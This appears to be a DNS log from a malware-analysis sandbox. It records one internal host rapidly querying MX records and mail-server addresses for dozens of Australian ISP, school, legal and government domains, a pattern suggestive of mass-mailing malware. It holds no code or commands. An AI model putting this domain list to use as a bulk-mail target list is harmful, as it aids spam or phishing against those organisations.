                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.911988974 CET8.8.8.8192.168.2.30xe90aNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.932250023 CET8.8.8.8192.168.2.30x5425No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.002940893 CET8.8.8.8192.168.2.30x7aadNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.021631002 CET8.8.8.8192.168.2.30xea46No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.021631002 CET8.8.8.8192.168.2.30xea46No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.183887005 CET8.8.8.8192.168.2.30x5adfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.183887005 CET8.8.8.8192.168.2.30x5adfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.183887005 CET8.8.8.8192.168.2.30x5adfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.202181101 CET8.8.8.8192.168.2.30xfafdNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.202181101 CET8.8.8.8192.168.2.30xfafdNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.202181101 CET8.8.8.8192.168.2.30xfafdNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.202181101 CET8.8.8.8192.168.2.30xfafdNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.202181101 CET8.8.8.8192.168.2.30xfafdNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.202181101 CET8.8.8.8192.168.2.30xfafdNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.202181101 CET8.8.8.8192.168.2.30xfafdNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.202181101 CET8.8.8.8192.168.2.30xfafdNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.373018026 CET8.8.8.8192.168.2.30xd5c1No error (0)tempofoods.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.374017954 CET8.8.8.8192.168.2.30xc1b5Name error (3)yahoo.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.410335064 CET8.8.8.8192.168.2.30x8a30No error (0)tempofoods-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.410335064 CET8.8.8.8192.168.2.30x8a30No error (0)tempofoods-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.562129021 CET8.8.8.8192.168.2.30xd33No error (0)paracombps.sa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.604238987 CET8.8.8.8192.168.2.30xad8cNo error (0)paracombps-sa-edu-au.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.604238987 CET8.8.8.8192.168.2.30xad8cNo error (0)paracombps-sa-edu-au.mail.protection.outlook.com104.47.74.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.650798082 CET8.8.8.8192.168.2.30x16e1No error (0)optushome.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.672497034 CET8.8.8.8192.168.2.30x6cfbNo error (0)mail.optusnet.com.au211.29.132.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.698988914 CET8.8.8.8192.168.2.30x4bf3No error (0)dodo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.746083975 CET8.8.8.8192.168.2.30x14c9No error (0)gtlaw.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.746083975 CET8.8.8.8192.168.2.30x14c9No error (0)gtlaw.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.757471085 CET8.8.8.8192.168.2.30xa745Name error (3)explosivestraining.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.769382954 CET8.8.8.8192.168.2.30xb76eNo error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.769382954 CET8.8.8.8192.168.2.30xb76eNo error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.769382954 CET8.8.8.8192.168.2.30xb76eNo error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.769382954 CET8.8.8.8192.168.2.30xb76eNo error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.797908068 CET8.8.8.8192.168.2.30x65c2No error (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.819432974 CET8.8.8.8192.168.2.30x563No error (0)extmail.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.819432974 CET8.8.8.8192.168.2.30x563No error (0)extmail.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.878474951 CET8.8.8.8192.168.2.30x1ddeNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.878474951 CET8.8.8.8192.168.2.30x1ddeNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.878474951 CET8.8.8.8192.168.2.30x1ddeNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.898513079 CET8.8.8.8192.168.2.30x6dc5No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.898513079 CET8.8.8.8192.168.2.30x6dc5No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.898513079 CET8.8.8.8192.168.2.30x6dc5No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.898513079 CET8.8.8.8192.168.2.30x6dc5No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.898513079 CET8.8.8.8192.168.2.30x6dc5No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.898513079 CET8.8.8.8192.168.2.30x6dc5No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.898513079 CET8.8.8.8192.168.2.30x6dc5No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.898513079 CET8.8.8.8192.168.2.30x6dc5No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.956581116 CET8.8.8.8192.168.2.30x5a5No error (0)thelakes.qld.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.956581116 CET8.8.8.8192.168.2.30x5a5No error (0)thelakes.qld.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.961534977 CET8.8.8.8192.168.2.30x87ecNo error (0)justice.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.961534977 CET8.8.8.8192.168.2.30x87ecNo error (0)justice.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.975699902 CET8.8.8.8192.168.2.30x22d2No error (0)au-smtp-inbound-2.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.975699902 CET8.8.8.8192.168.2.30x22d2No error (0)au-smtp-inbound-2.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.975699902 CET8.8.8.8192.168.2.30x22d2No error (0)au-smtp-inbound-2.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.975699902 CET8.8.8.8192.168.2.30x22d2No error (0)au-smtp-inbound-2.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.000745058 CET8.8.8.8192.168.2.30x14faNo error (0)mx-ctdodo.gtm.oss-core.net203.134.71.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.000745058 CET8.8.8.8192.168.2.30x14faNo error (0)mx-ctdodo.gtm.oss-core.net203.134.153.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.084918976 CET8.8.8.8192.168.2.30xd5ebNo error (0)mxa-001fc401.gslb.pphosted.com185.132.182.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.098609924 CET8.8.8.8192.168.2.30xf9efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.098609924 CET8.8.8.8192.168.2.30xf9efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.098609924 CET8.8.8.8192.168.2.30xf9efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.118757010 CET8.8.8.8192.168.2.30x97f6No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.118757010 CET8.8.8.8192.168.2.30x97f6No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.118757010 CET8.8.8.8192.168.2.30x97f6No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.118757010 CET8.8.8.8192.168.2.30x97f6No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.118757010 CET8.8.8.8192.168.2.30x97f6No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.118757010 CET8.8.8.8192.168.2.30x97f6No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.118757010 CET8.8.8.8192.168.2.30x97f6No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.118757010 CET8.8.8.8192.168.2.30x97f6No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.200416088 CET8.8.8.8192.168.2.30x944aNo error (0)inchcape.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.200416088 CET8.8.8.8192.168.2.30x944aNo error (0)inchcape.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.223676920 CET8.8.8.8192.168.2.30x11b0No error (0)mx07-00031601.pphosted.com91.207.212.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.362906933 CET8.8.8.8192.168.2.30xe57fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.362906933 CET8.8.8.8192.168.2.30xe57fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.362906933 CET8.8.8.8192.168.2.30xe57fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.385353088 CET8.8.8.8192.168.2.30x1062No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.385353088 CET8.8.8.8192.168.2.30x1062No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.385353088 CET8.8.8.8192.168.2.30x1062No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.385353088 CET8.8.8.8192.168.2.30x1062No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.385353088 CET8.8.8.8192.168.2.30x1062No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.385353088 CET8.8.8.8192.168.2.30x1062No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.385353088 CET8.8.8.8192.168.2.30x1062No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.385353088 CET8.8.8.8192.168.2.30x1062No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.474930048 CET8.8.8.8192.168.2.30xc59aNo error (0)netspace.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.486974955 CET8.8.8.8192.168.2.30x61bfNo error (0)tased.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.495006084 CET8.8.8.8192.168.2.30x5fadNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.515690088 CET8.8.8.8192.168.2.30x4593No error (0)tased-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.515690088 CET8.8.8.8192.168.2.30x4593No error (0)tased-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.558130980 CET8.8.8.8192.168.2.30x62a5No error (0)iia.org.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.558130980 CET8.8.8.8192.168.2.30x62a5No error (0)iia.org.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.567778111 CET8.8.8.8192.168.2.30x2ee2No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.567778111 CET8.8.8.8192.168.2.30x2ee2No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.567778111 CET8.8.8.8192.168.2.30x2ee2No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.567778111 CET8.8.8.8192.168.2.30x2ee2No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.567778111 CET8.8.8.8192.168.2.30x2ee2No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.580904961 CET8.8.8.8192.168.2.30x3e02No error (0)d324465.b.ess.de.barracudanetworks.com18.185.115.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.580904961 CET8.8.8.8192.168.2.30x3e02No error (0)d324465.b.ess.de.barracudanetworks.com18.185.115.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.580904961 CET8.8.8.8192.168.2.30x3e02No error (0)d324465.b.ess.de.barracudanetworks.com18.185.115.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.595613003 CET8.8.8.8192.168.2.30x5329No error (0)alt3.aspmx.l.google.com142.251.8.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.712346077 CET8.8.8.8192.168.2.30xb627No error (0)carey.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.774132013 CET8.8.8.8192.168.2.30xa273No error (0)carey-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.774132013 CET8.8.8.8192.168.2.30xa273No error (0)carey-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.788470030 CET8.8.8.8192.168.2.30x7b9dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.788470030 CET8.8.8.8192.168.2.30x7b9dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.788470030 CET8.8.8.8192.168.2.30x7b9dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.847167969 CET8.8.8.8192.168.2.30xb52bNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.847167969 CET8.8.8.8192.168.2.30xb52bNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.847167969 CET8.8.8.8192.168.2.30xb52bNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.847167969 CET8.8.8.8192.168.2.30xb52bNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.847167969 CET8.8.8.8192.168.2.30xb52bNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.847167969 CET8.8.8.8192.168.2.30xb52bNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.847167969 CET8.8.8.8192.168.2.30xb52bNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.847167969 CET8.8.8.8192.168.2.30xb52bNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.861349106 CET8.8.8.8192.168.2.30xd2e7No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.861349106 CET8.8.8.8192.168.2.30xd2e7No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.092067957 CET8.8.8.8192.168.2.30xb4e6No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.095107079 CET8.8.8.8192.168.2.30xa63aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.095107079 CET8.8.8.8192.168.2.30xa63aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.095107079 CET8.8.8.8192.168.2.30xa63aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.116235971 CET8.8.8.8192.168.2.30xbff5No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.116235971 CET8.8.8.8192.168.2.30xbff5No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.116235971 CET8.8.8.8192.168.2.30xbff5No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.116235971 CET8.8.8.8192.168.2.30xbff5No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.116235971 CET8.8.8.8192.168.2.30xbff5No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.116235971 CET8.8.8.8192.168.2.30xbff5No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.116235971 CET8.8.8.8192.168.2.30xbff5No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.116235971 CET8.8.8.8192.168.2.30xbff5No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.184202909 CET8.8.8.8192.168.2.30x8a0fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.184202909 CET8.8.8.8192.168.2.30x8a0fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.184202909 CET8.8.8.8192.168.2.30x8a0fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.204651117 CET8.8.8.8192.168.2.30xad8cNo error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.204651117 CET8.8.8.8192.168.2.30xad8cNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.204651117 CET8.8.8.8192.168.2.30xad8cNo error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.204651117 CET8.8.8.8192.168.2.30xad8cNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.204651117 CET8.8.8.8192.168.2.30xad8cNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.204651117 CET8.8.8.8192.168.2.30xad8cNo error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.204651117 CET8.8.8.8192.168.2.30xad8cNo error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.204651117 CET8.8.8.8192.168.2.30xad8cNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.318171024 CET8.8.8.8192.168.2.30x92e9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.318171024 CET8.8.8.8192.168.2.30x92e9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.318171024 CET8.8.8.8192.168.2.30x92e9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.338010073 CET8.8.8.8192.168.2.30x6438No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.338010073 CET8.8.8.8192.168.2.30x6438No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.338010073 CET8.8.8.8192.168.2.30x6438No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.338010073 CET8.8.8.8192.168.2.30x6438No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.338010073 CET8.8.8.8192.168.2.30x6438No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.338010073 CET8.8.8.8192.168.2.30x6438No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.338010073 CET8.8.8.8192.168.2.30x6438No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.338010073 CET8.8.8.8192.168.2.30x6438No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.350231886 CET8.8.8.8192.168.2.30xb5f0Name error (3)bmcl.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.422638893 CET8.8.8.8192.168.2.30xa50No error (0)amnet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.524029016 CET8.8.8.8192.168.2.30x46deNo error (0)waverleyrsl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.524029016 CET8.8.8.8192.168.2.30x46deNo error (0)waverleyrsl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.524029016 CET8.8.8.8192.168.2.30x46deNo error (0)waverleyrsl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.559722900 CET8.8.8.8192.168.2.30x8a5cNo error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.577826023 CET8.8.8.8192.168.2.30x1847No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
